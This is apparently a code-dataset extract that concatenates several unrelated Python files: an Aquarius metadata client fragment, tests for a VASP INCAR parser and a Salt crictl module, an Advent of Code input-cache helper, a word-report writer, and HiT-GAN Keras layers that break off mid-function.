return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return {}
return parsed_response
def list_assets_metadata(self):
return json.loads(requests.get(self._base_url + '/ddo').content)
def publish_asset_metadata(self, asset_ddo):
asset_did = asset_ddo.did
response = requests.post(self._base_url + '/ddo', data=asset_ddo.as_text(), headers=self._headers)
        if response.status_code == 500:
            raise ValueError("This Asset ID already exists! \n\tHTTP Error message: \n\t\t{}".format(response.text))
        elif response.status_code == 400:
            raise Exception("400 ERROR Full error: \n{}".format(response.text))
        elif response.status_code != 201:
            raise Exception("{} ERROR Full error: \n{}".format(response.status_code, response.text))
        # status_code == 201: the DDO was stored successfully
        response = json.loads(response.content)
        logging.debug("Published asset DID {}".format(asset_did))
        return response
def update_asset_metadata(self, asset_did, asset_ddo):
return json.loads(
requests.put(self._base_url + '/ddo/%s' % asset_did, data=asset_ddo.as_text(),
headers=self._headers).content)
def text_search(self, text, sort=None, offset=100, page=0):
payload = {"text": text, "sort": sort, "offset": offset, "page": page}
response = requests.get(
self._base_url + '/ddo/query',
params=payload,
headers=self._headers
).content
if not response:
return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return []
elif isinstance(parsed_response, list):
return parsed_response
else:
            raise ValueError('Unknown search response, expecting a list, got "%s".' % type(parsed_response))
def query_search(self, search_query):
response = requests.post(
self._base_url + '/ddo/query',
data=json.dumps(search_query),
headers=self._headers
).content
if not response:
return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return []
elif isinstance(parsed_response, list):
return parsed_response
else:
            raise ValueError('Unknown search response, expecting a list, got "%s".' % type(parsed_response))
def retire_asset_metadata(self, asset_did):
response = requests.delete(self._base_url + '/ddo/%s' % asset_did, headers=self._headers)
logging.debug("Removed asset DID: {} from metadata store".format(asset_did))
return response
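# --- Hedged usage sketch (added): the URL and DID below are local-dev
# placeholders, not real endpoints or identifiers.
def _aquarius_example():
    aquarius = AquariusWrapper('http://localhost:5000')
    print(aquarius.list_assets())                          # all known asset ids
    metadata = aquarius.get_asset_metadata('did:op:1234')  # {} if missing
    return metadata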
| 35.61157 | 116 | 0.616152 | 507 | 4,309 | 5.04142 | 0.209073 | 0.087637 | 0.04734 | 0.043818 | 0.563772 | 0.5223 | 0.457746 | 0.286776 | 0.258607 | 0.258607 | 0 | 0.007386 | 0.277327 | 4,309 | 120 | 117 | 35.908333 | 0.813423 | 0.024368 | 0 | 0.467391 | 0 | 0 | 0.134468 | 0.017018 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.032609 | 0.032609 | 0.326087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baca0b9e9638a98e7c01ff2d15f7a1ae56b3423 | 3,843 | py | Python | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/tests/test_incar_parser.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """Test the INCAR parser."""
# pylint: disable=redefined-outer-name, unused-wildcard-import, unused-argument, wildcard-import
import pytest
from aiida_vasp.utils.fixtures import *
from aiida_vasp.parsers.content_parsers.incar import IncarParser
from aiida_vasp.utils.aiida_utils import get_data_node
compare_incar = {'gga': 'PE', 'gga_compat': False, 'lorbit': 11, 'magmom': '30 * 2*0.', 'sigma': 0.5}
@pytest.mark.parametrize(['incar_parser'], [('incar',)], indirect=True)
def test_parse_incar(incar_parser):
"""Load a reference INCAR parser.
We check that it parses and provides the correct content for the default INCAR.
"""
# The structure for the INCAR parser should have the key `incar-structure`
result = incar_parser.get_quantity('incar')
assert result == compare_incar
@pytest.mark.parametrize(['incar_parser'], [('phonondb',)], indirect=True)
def test_parse_incar_phonon(incar_parser):
"""Load a reference INCAR parser.
We check that it parses and provides the correct content for an INCAR used for
phonon calculations.
"""
incar = incar_parser.incar
assert incar['prec'] == 'Accurate'
assert incar['ibrion'] == -1
assert incar['encut'] == pytest.approx(359.7399)
assert incar['lreal'] is False
@pytest.mark.parametrize(['incar_parser'], [('incar',)], indirect=True)
def test_parse_incar_write(incar_parser, tmpdir):
"""Load a reference INCAR parser and check that the write functionality works.
Here we make sure the write function of the content parser works.
"""
# Write the loaded structure to file
temp_path = str(tmpdir.join('INCAR'))
incar_parser.write(temp_path)
# Load the written structure using a new content parser instance
content = None
with open(temp_path, 'r', encoding='utf8') as handler:
content = handler.readlines()
ref_content = ['GGA = PE\n', 'GGA_COMPAT = .FALSE.\n', 'LORBIT = 11\n', 'MAGMOM = 30 * 2*0.\n', 'SIGMA = 0.5\n']
assert content == ref_content
def test_parse_incar_data(vasp_params, tmpdir):
"""Load a reference AiiDA Dict and check that the parser can
initialize using the data.
Using the Dict sitting in the initialized parser it should
write that content to an INCAR file when issuing write which is also tested,
file is reloaded and content checked.
"""
# Initialize parser with an existing reference Dict
incar_parser = IncarParser(data=vasp_params)
# Check that get_quantity return the same Dict instance
assert vasp_params == incar_parser.get_quantity('key_does_not_matter')
# Write the loaded Dict to file, which behind the scenes convert it
# to a INCAR format
temp_path = str(tmpdir.join('INCAR'))
incar_parser.write(temp_path)
# Load the written INCAR using a new content parser instance
parser = None
with open(temp_path, 'r', encoding='utf8') as handler:
parser = IncarParser(handler=handler)
result = parser.get_quantity('incar')
assert vasp_params.get_dict() == result
@pytest.mark.parametrize(['incar_parser'], [(['incar', 'INCAR.nohash'],)], indirect=True)
def test_parse_incar_nohash(incar_parser):
"""Load a reference INCAR parser.
    Using parsevasp. The returned content should be None,
    since parsevasp refuses to parse an INCAR whose
    comments do not start with hashtags.
"""
result = incar_parser.incar
assert result is None
def test_parse_incar_invalid_tag(vasp_params, tmpdir):
"""Test parsing an INCAR with an invalid tag."""
params = vasp_params.get_dict()
params.update(foo='bar')
vasp_params_modified = get_data_node('dict', dict=params)
parser = IncarParser(data=vasp_params_modified)
temp_path = str(tmpdir.join('INCAR'))
with pytest.raises(SystemExit):
parser.write(temp_path)
| 34.00885 | 116 | 0.710903 | 537 | 3,843 | 4.947858 | 0.284916 | 0.08694 | 0.027098 | 0.038389 | 0.341739 | 0.275875 | 0.207753 | 0.194204 | 0.194204 | 0.194204 | 0 | 0.008283 | 0.18319 | 3,843 | 112 | 117 | 34.3125 | 0.838165 | 0.363518 | 0 | 0.191489 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0.191489 | 1 | 0.12766 | false | 0 | 0.085106 | 0 | 0.212766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bad23704f0d73d672d26d8a3ad2319bd057edf0 | 9,555 | py | Python | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 23 | 2018-03-16T09:06:46.000Z | 2018-08-02T00:02:07.000Z | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 131 | 2018-03-13T07:31:34.000Z | 2018-08-02T21:57:18.000Z | salt/tests/unit/modules/test_cri.py | SaintLoong/metalk8s | 06fa3a731f35ab0f9ad8d3443fd8f8c4e7037432 | [
"Apache-2.0"
] | 4 | 2018-04-03T07:18:39.000Z | 2018-07-02T22:56:56.000Z | import json
from unittest import TestCase
from unittest.mock import MagicMock, patch
from parameterized import parameterized
from _modules import cri
from tests.unit import mixins
from tests.unit import utils
IMAGES_LIST = [
{
"id": "sha256:da86e6ba6ca197bf6bc5e9d900febd906b133eaa4750e6bed647b0fbe50ed43e",
"repoTags": ["k8s.gcr.io/pause:3.1"],
"repoDigests": [],
"size": "746400",
"uid": None,
"username": "",
},
{
"id": "sha256:2c4adeb21b4ff8ed3309d0e42b6b4ae39872399f7b37e0856e673b13c4aba13d",
"repoTags": [
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd:3.3.10",
"myEtcdTag",
],
"repoDigests": [
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd@sha256:240bd81c2f54873804363665c5d1a9b8e06ec5c63cfc181e026ddec1d81585bb"
],
"size": "76160693",
"uid": None,
"username": "",
},
]
COMPONENT_LIST = [
{
"id": "225a77f7ef0df4347ac7ac81a351f3b122b592cbbee62e157061cf28a811ac45",
"metadata": {
"name": "etcd-bootstrap",
"uid": "f556b9016283651c92291c6d844ea468",
"namespace": "kube-system",
"attempt": 2,
},
"state": "SANDBOX_READY",
"createdAt": "1593676785281403260",
"labels": {
"component": "etcd",
"io.kubernetes.pod.name": "etcd-bootstrap",
"io.kubernetes.pod.namespace": "kube-system",
"io.kubernetes.pod.uid": "f556b9016283651c92291c6d844ea468",
"metalk8s.scality.com/version": "2.5.1-dev",
"tier": "control-plane",
},
"annotations": {
"kubernetes.io/config.hash": "f556b9016283651c92291c6d844ea468",
"kubernetes.io/config.seen": "2020-07-02T07:59:42.325844296Z",
"kubernetes.io/config.source": "file",
"scheduler.alpha.kubernetes.io/critical-pod": "",
},
}
]
class CriTestCase(TestCase, mixins.LoaderModuleMockMixin):
"""
TestCase for `cri` module
"""
loader_module = cri
def test_virtual(self):
"""
Tests the return of `__virtual__` function
"""
self.assertEqual(cri.__virtual__(), "cri")
@parameterized.expand(
[
(0, json.dumps({"images": IMAGES_LIST}, indent=4), IMAGES_LIST),
(1, "this command failed", None),
(0, json.dumps({"images": []}, indent=4), []),
]
)
def test_list_image(self, retcode, stdout, result):
"""
Tests the return of `list_images` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.list_images(), result)
mock_cmd.assert_called_once_with("crictl images -o json")
@parameterized.expand(
[
(IMAGES_LIST, "k8s.gcr.io/pause:3.1", True),
(
IMAGES_LIST,
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd:3.3.10",
True,
),
(IMAGES_LIST, "myEtcdTag", True),
(
IMAGES_LIST,
"metalk8s-registry-from-config.invalid/metalk8s-2.4.2/etcd@sha256:240bd81c2f54873804363665c5d1a9b8e06ec5c63cfc181e026ddec1d81585bb",
True,
),
(IMAGES_LIST, "Abc", False),
(None, "k8s.gcr.io/pause:3.1", False),
([], "k8s.gcr.io/pause:3.1", False),
]
)
def test_available(self, images_list, name, result):
"""
Tests the return of `available` function
"""
with patch.object(cri, "list_images", MagicMock(return_value=images_list)):
self.assertEqual(cri.available(name), result)
@parameterized.expand(
[
(
0,
"Image is up to date for sha256:2bd222736f60f13a760bcfcc0728e4bd0812169d9d3068c01319c72102c9972a",
{
"digests": {
"sha256": "2bd222736f60f13a760bcfcc0728e4bd0812169d9d3068c01319c72102c9972a"
}
},
),
(1, "", None),
(0, "Not expected result", {"digests": {}}),
]
)
def test_pull_image(self, retcode, stdout, result):
"""
Tests the return of `pull_image` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.pull_image("my-images"), result)
mock_cmd.assert_called_once_with('crictl pull "my-images"')
@parameterized.expand(
[
(0, "292c3b07b", 0, "All ok", "All ok"),
(1, "292c3b07b", 0, "All ok", None),
(0, "", 0, "All ok", None),
(0, "292c3b07b", 1, "All not ok", None),
(0, "292c3b07b", 0, "", ""),
]
)
def test_execute(self, ret_ps, stdout_ps, ret_exec, stdout_exec, result):
"""
Tests the return of `execute` function
"""
cmd_ps = utils.cmd_output(retcode=ret_ps, stdout=stdout_ps)
cmd_exec = utils.cmd_output(retcode=ret_exec, stdout=stdout_exec)
def _cmd_run_all_mock(cmd):
if "crictl ps" in cmd:
return cmd_ps
elif "crictl exec" in cmd:
return cmd_exec
return None
mock_cmd = MagicMock(side_effect=_cmd_run_all_mock)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.execute("my_cont", "my command"), result)
mock_cmd.assert_any_call(
'crictl ps -q --label io.kubernetes.container.name="my_cont"'
)
if ret_ps == 0 and stdout_ps:
mock_cmd.assert_called_with(
"crictl exec {} my command ".format(stdout_ps)
)
@parameterized.expand(
[
# Success: Found one container
(None, 6, 0, "292c3b07b", True),
# Failure: Container does not exist
(
None,
6,
0,
"",
'Failed to find container "my_cont": No container found',
True,
),
# Failure: Error occurred when executing crictl command
(
None,
6,
1,
"Error occurred",
'Failed to find container "my_cont": Error occurred',
True,
),
# Success: Found one running container
("running", 6, 0, "292c3b07b", True),
# Failure: Container does not exist or is not running
(
"running",
6,
0,
"",
'Failed to find container "my_cont" in state "running": No container found',
True,
),
# Failure: Error occurred when executing crictl command
(
"running",
6,
1,
"Error occurred",
'Failed to find container "my_cont" in state "running": Error occurred',
True,
),
]
)
def test_wait_container(
self, state, timeout, retcode, stdout, result, raises=False
):
"""
Tests the return of `wait_container` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}), patch(
"time.sleep", MagicMock()
):
if raises:
self.assertRaisesRegex(
Exception,
result,
cri.wait_container,
"my_cont",
state=state,
timeout=timeout,
)
else:
self.assertEqual(
cri.wait_container("my_cont", state=state, timeout=timeout), result
)
cmd_call = 'crictl ps -q --label io.kubernetes.container.name="my_cont"'
if state:
cmd_call += " --state {}".format(state)
mock_cmd.assert_called_with(cmd_call)
@parameterized.expand(
[
(0, json.dumps({"items": COMPONENT_LIST}, indent=4), True),
(1, "this command failed", False),
(0, json.dumps({"items": []}, indent=4), False),
]
)
def test_component_is_running(self, retcode, stdout, result):
"""
Tests the return of `component_is_running` function
"""
cmd = utils.cmd_output(retcode=retcode, stdout=stdout)
mock_cmd = MagicMock(return_value=cmd)
with patch.dict(cri.__salt__, {"cmd.run_all": mock_cmd}):
self.assertEqual(cri.component_is_running("my_comp"), result)
@parameterized.expand([(0, True), (1, False)])
def test_ready(self, retcode, result):
"""
Tests the return of `ready` function
"""
mock_cmd = MagicMock(return_value=retcode)
with patch.dict(cri.__salt__, {"cmd.retcode": mock_cmd}):
self.assertEqual(cri.ready(), result)
| 34.247312 | 148 | 0.531554 | 919 | 9,555 | 5.357998 | 0.199129 | 0.025589 | 0.022746 | 0.025995 | 0.435418 | 0.372868 | 0.362104 | 0.353981 | 0.339764 | 0.256296 | 0 | 0.087981 | 0.346939 | 9,555 | 278 | 149 | 34.370504 | 0.701122 | 0.065829 | 0 | 0.266667 | 0 | 0.017778 | 0.264649 | 0.131407 | 0 | 0 | 0 | 0 | 0.062222 | 1 | 0.04 | false | 0 | 0.031111 | 0 | 0.093333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baf5d1709dd6b0d9d4aa7b5ca119e04b576dfc4 | 3,681 | py | Python | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | advent_of_code/cache_file.py | fossabot/advent-of-code-2 | e39ee7c4642dc76dc04d02b8ae0f0f622fd9adc4 | [
"MIT"
] | null | null | null | """ Module which performs cache file related operation stored over CACHE_DIR of OS"""
import os
import time
from pathlib import Path
import appdirs
def check_if_downloaded(year, day, session):
"""Check if an input is downloaded and cached or not in cache location"""
cache_file = _join_path(year, day, session, input_file=True)
cache_file = Path(cache_file)
return cache_file.exists()
def save_input_to_location(year, day, session, input_data):
"""Save a input to its cache location for future reference and use"""
cache_folder = _join_path(year, day, session)
Path(cache_folder).mkdir(parents=True, exist_ok=True)
cache_file = os.path.join(cache_folder, "input.txt")
with open(cache_file, "w+") as opened_file:
opened_file.write(input_data)
def delete_input(year, day, session):
"""Delete input from a cache folder"""
cache_file = _join_path(year, day, session, input_file=True)
if Path(cache_file).exists():
os.remove(cache_file)
def cache_file_data(year, day, session):
"""Return cache file input data from cache folder for certain problem"""
from .server_action import download_input
download_input(year, day, session)
cache_file = _join_path(year, day, session, input_file=True)
with open(cache_file) as opened_file:
input_data = opened_file.read()
return input_data
def save_submitted_answer(year, day, part, session, output, message):
"""Save submitted input to file of problem"""
submitted_file = _join_path(year, day, session, submission=True)
with open(submitted_file, "a") as opened_file:
opened_file.write("{}!{}:{}\n".format(part, output, message))
def last_submitted_answer_message(year, day, part, session, output):
    """
    Check if an answer was already submitted by the user; if so, return the
    message of the last matching submission.
    """
    submission_file = _join_path(year, day, session, submission=True)
    last_answer_message = None
    with open(submission_file, "r") as opened_file:
        lines = opened_file.readlines()
    for line in lines:
        # each line has the format "<part>!<output>:<message>"
        separate_part = line.split("!", 1)
        if separate_part[0] == str(part):
            separate_output = separate_part[1].split(":", 1)
            if separate_output[0] == str(output):
                last_answer_message = separate_output[1].rstrip("\n")
    return last_answer_message
def save_last_submission_time(year, day, session):
"""Save a time where a request is performed for last submission"""
last_time_file = _join_path(year, day, session, last_file=True)
with open(last_time_file, "w") as opened_file:
opened_file.write(str(time.time()))
def check_less_than_one_min_submission(year, day, session):
"""
Check last submission time for solution return true if time is less than 60 second
"""
last_time_file = _join_path(year, day, session, last_file=True)
with open(last_time_file, "r") as opened_file:
last_time = float(opened_file.read())
current_time = time.time()
early_submission = current_time - last_time < 60.0
return early_submission
def _join_path(year, day, session, input_file=False, submission=False, last_file=False):
"""Return out desire path for a config folders and files"""
cache_location = appdirs.user_cache_dir(appname="advent-of-code")
cache_file = os.path.join(cache_location, str(session), str(year), str(day))
if input_file:
cache_file = os.path.join(cache_file, "input.txt")
if submission:
cache_file = os.path.join(cache_file, "submission.txt")
if last_file:
cache_file = os.path.join(cache_file, "time.txt")
return cache_file
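# --- Hedged usage sketch (added): the session token below is a made-up
# placeholder; real tokens come from the adventofcode.com session cookie.
def _cache_path_example():
    session = "example-session-token"
    path = _join_path(2020, 1, session, input_file=True)
    # e.g. <user cache dir>/advent-of-code/<session>/2020/1/input.txt
    return path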
| 37.561224 | 88 | 0.697908 | 530 | 3,681 | 4.611321 | 0.207547 | 0.081015 | 0.091653 | 0.055237 | 0.287234 | 0.246318 | 0.21563 | 0.191489 | 0.10802 | 0.10802 | 0 | 0.003393 | 0.199402 | 3,681 | 97 | 89 | 37.948454 | 0.825925 | 0.173866 | 0 | 0.080645 | 0 | 0 | 0.024283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145161 | false | 0 | 0.080645 | 0 | 0.306452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb0f397622a9e3207cdf5137d3ce4743a15d1c7 | 2,149 | py | Python | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | 1 | 2020-07-12T13:24:21.000Z | 2020-07-12T13:24:21.000Z | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | null | null | null | wordsfinder/report_writers.py | ravique/otus-homework1 | 67daeba3b46c8a0cb078abf84abafbf8d736e297 | [
"MIT"
] | null | null | null | import os
import csv
import json
import datetime
def compose_report_name(file_format: str) -> str:
file_name = f'{datetime.datetime.now().date()}-report.{file_format}'
counter = 1
while os.path.isfile(f'./{file_name}'):
file_name = f'{datetime.datetime.now().date()}-{counter}-report.{file_format}'
counter += 1
return file_name
def write_report_to_console(words: dict, total_words_counter: int, unique_words_counter: int) -> None:
print('total %s words, %s unique' % (total_words_counter, unique_words_counter))
if words and total_words_counter != 0:
for word_type, counted_words in words.items():
print('---------------------')
print(f'Word type {word_type}:')
for word, occurrence in counted_words.items():
print(f'{word} – {occurrence} times')
else:
print('No words found')
def write_report_to_csv(words: dict, total_words_counter: int, unique_words_counter: int) -> bool:
csv_file_name = compose_report_name('csv')
with open(csv_file_name, 'a', newline='', encoding='utf-8') as report_file:
report_writer = csv.writer(report_file, delimiter=';')
report_writer.writerow(('total %s words, %s unique' % (total_words_counter, unique_words_counter),))
if words:
for word_type, counted_words in words.items():
report_writer.writerow((word_type,))
for word, occurrence in counted_words.items():
report_writer.writerow((word, occurrence))
else:
            report_writer.writerow(('No words found',))  # tuple: one cell, not one column per character
return True
def write_report_to_json(words: dict, total_words_counter: int, unique_words_counter: int) -> bool:
report_dict = dict()
report_dict['general_report'] = {'total_words': total_words_counter, 'unique_words': unique_words_counter}
if words:
report_dict['words_report'] = words
json_file_name = compose_report_name('json')
with open(json_file_name, 'w', newline='', encoding='utf-8') as report_json_file:
json.dump(report_dict, report_json_file, indent=4)
return True
| 34.66129 | 110 | 0.659842 | 284 | 2,149 | 4.704225 | 0.228873 | 0.116766 | 0.089072 | 0.035928 | 0.560629 | 0.447605 | 0.374252 | 0.326347 | 0.273952 | 0.208084 | 0 | 0.00354 | 0.211261 | 2,149 | 61 | 111 | 35.229508 | 0.784071 | 0 | 0 | 0.232558 | 0 | 0 | 0.161005 | 0.063751 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.093023 | 0 | 0.255814 | 0.116279 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb80b23f6b766d35d6297d8ff1e8c81ed006284 | 14,967 | py | Python | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 67 | 2021-12-24T00:39:24.000Z | 2022-03-31T04:24:53.000Z | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 1 | 2022-02-28T12:58:28.000Z | 2022-03-01T11:34:41.000Z | models/layers.py | google-research/hit-gan | b7671bc9215056632dd0b4cb7701bcf644ec3ad0 | [
"Apache-2.0"
] | 4 | 2022-01-04T09:16:32.000Z | 2022-03-15T22:39:32.000Z | # coding=utf-8
# Copyright 2021 The HiT-GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model layers for HiT-GAN."""
import math
import string
from typing import Any, Callable, List, Optional, Text
import numpy as np
import tensorflow as tf
_CHR_IDX = string.ascii_lowercase
def _build_attention_equation(rank, attn_axes):
"""Builds einsum equations for the attention computation.
Query, key, value inputs after projection are expected to have the shape as:
(bs, <non-attention dims>, <attention dims>, num_heads, channels).
bs and <non-attention dims> are treated as <batch dims>.
The attention operations can be generalized:
(1) Query-key dot product:
(<batch dims>, <query attention dims>, num_heads, channels), (<batch dims>,
<key attention dims>, num_heads, channels) -> (<batch dims>,
num_heads, <query attention dims>, <key attention dims>)
(2) Combination:
(<batch dims>, num_heads, <query attention dims>, <key attention dims>),
(<batch dims>, <value attention dims>, num_heads, channels) -> (<batch dims>,
<query attention dims>, num_heads, channels)
Args:
rank: the rank of query, key, value tensors.
attn_axes: a list/tuple of axes, [-1, rank), that will do attention.
Returns:
Einsum equations.
"""
target_notation = _CHR_IDX[:rank]
# `batch_dims` includes the head dim.
batch_dims = tuple(np.delete(range(rank), attn_axes + (rank - 1,)))
letter_offset = rank
source_notation = ""
for i in range(rank):
if i in batch_dims or i == rank - 1:
source_notation += target_notation[i]
else:
source_notation += _CHR_IDX[letter_offset]
letter_offset += 1
product_notation = "".join([target_notation[i] for i in batch_dims] +
[target_notation[i] for i in attn_axes] +
[source_notation[i] for i in attn_axes])
dot_product_equation = "%s,%s->%s" % (source_notation, target_notation,
product_notation)
attn_scores_rank = len(product_notation)
combine_equation = "%s,%s->%s" % (product_notation, source_notation,
target_notation)
return dot_product_equation, combine_equation, attn_scores_rank
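# --- Hedged worked example (added): tracing the helper above for a
# (batch, seq, heads, channels) tensor, i.e. rank=4 attending over axis 1.
# The literal strings were derived by hand from the loop logic:
#   dot_eq, comb_eq, _ = _build_attention_equation(4, (1,))
#   dot_eq  == 'aecd,abcd->acbe'  # scores: (batch, heads, query, key)
#   comb_eq == 'acbe,aecd->abcd'  # combine back to (batch, seq, heads, ch)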
def _build_proj_equation(free_dims, bound_dims, output_dims):
"""Builds an einsum equation for projections inside multi-head attention."""
input_str = ""
kernel_str = ""
output_str = ""
bias_axes = ""
letter_offset = 0
for i in range(free_dims):
char = _CHR_IDX[i + letter_offset]
input_str += char
output_str += char
letter_offset += free_dims
for i in range(bound_dims):
char = _CHR_IDX[i + letter_offset]
input_str += char
kernel_str += char
letter_offset += bound_dims
for i in range(output_dims):
char = _CHR_IDX[i + letter_offset]
kernel_str += char
output_str += char
bias_axes += char
equation = "%s,%s->%s" % (input_str, kernel_str, output_str)
return equation, bias_axes, len(output_str)
def _get_output_shape(output_rank, known_last_dims):
return [None] * (output_rank - len(known_last_dims)) + list(known_last_dims)
def make_norm_layer(
norm_type: Optional[Text] = "batch") -> tf.keras.layers.Layer:
"""Makes the normalization layer.
Args:
norm_type: A string for the type of normalization.
Returns:
A `tf.keras.layers.Layer` instance.
"""
if norm_type is None:
return tf.keras.layers.Layer() # Identity.
elif norm_type == "batch":
return tf.keras.layers.BatchNormalization()
elif norm_type == "syncbatch":
return tf.keras.layers.experimental.SyncBatchNormalization()
elif norm_type == "layer":
return tf.keras.layers.LayerNormalization(epsilon=1e-6)
else:
raise ValueError("{} is not a recognized norm type".format(norm_type))
class PositionEmbedding(tf.keras.layers.Layer):
"""Defines learnable positional embeddings."""
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
input_height = input_shape[-3]
input_width = input_shape[-2]
self.embedding_weight = self.add_weight(
"embedding_weight",
shape=(1, input_height, input_width, input_dim),
initializer=tf.keras.initializers.TruncatedNormal(stddev=0.02),
trainable=True)
super().build(input_shape)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
return inputs + self.embedding_weight
class SkipToRGB(tf.keras.layers.Layer):
"""Converts skip inputs to RGB images."""
def __init__(self,
output_dim: int = 3,
norm_type: Text = "layer",
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
output_dim: An integer for the output channel dimension.
norm_type: A string for the type of normalization.
      kernel_initializer: Initialization function of dense kernels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self.output_layer = tf.keras.Sequential([
make_norm_layer(norm_type),
tf.keras.layers.Dense(
output_dim,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer)
])
self.upsample = tf.keras.layers.UpSampling2D()
def call(self,
inputs: tf.Tensor,
skip_inputs: Optional[tf.Tensor],
training: Optional[bool] = None) -> tf.Tensor:
outputs = self.output_layer(inputs, training=training)
if skip_inputs is not None:
skip_outputs = self.upsample(skip_inputs)
outputs = skip_outputs + outputs
return outputs
class PixelShuffle(tf.keras.layers.Layer):
"""Up-sampling layer using pixel shuffle."""
def __init__(self,
output_dim: int,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
output_dim: An integer for the output channel dimension.
      kernel_initializer: Initialization function of dense kernels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._output_dim = output_dim
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
if input_shape[-1] // 4 == self._output_dim:
self.dense_layer = None
else:
self.dense_layer = tf.keras.layers.Dense(
self._output_dim,
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
super().build(input_shape)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
